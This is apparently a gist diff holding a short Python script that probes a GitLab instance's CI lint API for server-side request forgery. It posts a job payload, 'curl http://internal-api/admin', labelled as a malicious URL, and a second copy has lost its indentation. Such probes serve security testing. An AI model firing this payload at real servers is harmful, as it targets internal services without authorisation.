HouqiyuA · May 21, 2025 08:23
diff --git a/gistfile1.txt b/gistfile1.txt
 import requests
 import json
 import time

 def test_idor_vulnerabilities():
    host = "DEPLOYED_GITLAB_HOST"
    port = "DEPLOYED GITLAB_PORT"
    url = f"http://{host}:{port}/api/v4/ci/lint"

    headers = {
        "Accept": "application/json",
        "Host": "gitlab.com",
        "Content-Type": "application/json",
        "PRIVATE-TOKEN": "YOUR TOKEN"
    }


    test_cases = [
        {
            "name": "Internal API Probe",
            "payload": "job:\n  script: curl http://internal-api/admin",   # <<Example of Malicious URL>>
            "include_merged": False,
            "include_jobs": True,
            "description": "Tests SSRF through job script definitions"
        }
    ]

    for test in test_cases:
        print(f"\n=== Testing: {test['name']} ===")
        print(f"Description: {test['description']}")

        test_body = {
            "content": test["payload"],
            "include_merged_yaml": test["include_merged"],
            "include_jobs": test["include_jobs"]
        }

        print("Test Payload:", json.dumps(test_body, indent=2))

        start_time = time.time()
        response = requests.post(url, headers=headers, json=test_body)
        elapsed_time = time.time() - start_time

        print("\nResponse:")
        print(f"Status Code: {response.status_code}")
        print(f"Response Time: {elapsed_time:.6f}s")
        print("Headers:")
        for header, value in response.headers.items():
            if header.startswith('X-'):
                print(f"  {header}: {value}")

        print("Body:", response.text)

        # Check for potential IDOR indicators
        if any(indicator in response.text.lower() for indicator in ['secret', 'password', 'internal', 'admin']):
            print("\n!!! POTENTIAL SENSITIVE DATA LEAKAGE !!!")

        if response.status_code == 200 and "valid" in response.text.lower():
            try:
                if response.json().get("status") == "valid":
                    print("\n!!! VULNERABILITY DETECTED !!!")
            except ValueError:
                pass

 if __name__ == "__main__":
    test_idor_vulnerabilities()
	import requests
	import json
	import time

	def test_idor_vulnerabilities():
	host = "DEPLOYED_GITLAB_HOST"
	port = "DEPLOYED GITLAB_PORT"
	url = f"http://{host}:{port}/api/v4/ci/lint"

	headers = {
	"Accept": "application/json",
	"Host": "gitlab.com",
	"Content-Type": "application/json",
	"PRIVATE-TOKEN": "YOUR TOKEN"
	}


	test_cases = [
	{
	"name": "Internal API Probe",
	"payload": "job:\n script: curl http://internal-api/admin", # <<Example of Malicious URL>>
	"include_merged": False,
	"include_jobs": True,
	"description": "Tests SSRF through job script definitions"
	}
	]

	for test in test_cases:
	print(f"\n=== Testing: {test['name']} ===")
	print(f"Description: {test['description']}")

	test_body = {
	"content": test["payload"],
	"include_merged_yaml": test["include_merged"],
	"include_jobs": test["include_jobs"]
	}

	print("Test Payload:", json.dumps(test_body, indent=2))

	start_time = time.time()
	response = requests.post(url, headers=headers, json=test_body)
	elapsed_time = time.time() - start_time

	print("\nResponse:")
	print(f"Status Code: {response.status_code}")
	print(f"Response Time: {elapsed_time:.6f}s")
	print("Headers:")
	for header, value in response.headers.items():
	if header.startswith('X-'):
	print(f" {header}: {value}")

	print("Body:", response.text)

	# Check for potential IDOR indicators
	if any(indicator in response.text.lower() for indicator in ['secret', 'password', 'internal', 'admin']):
	print("\n!!! POTENTIAL SENSITIVE DATA LEAKAGE !!!")

	if response.status_code == 200 and "valid" in response.text.lower():
	try:
	if response.json().get("status") == "valid":
	print("\n!!! VULNERABILITY DETECTED !!!")
	except ValueError:
	pass

	if __name__ == "__main__":
	test_idor_vulnerabilities()
No results found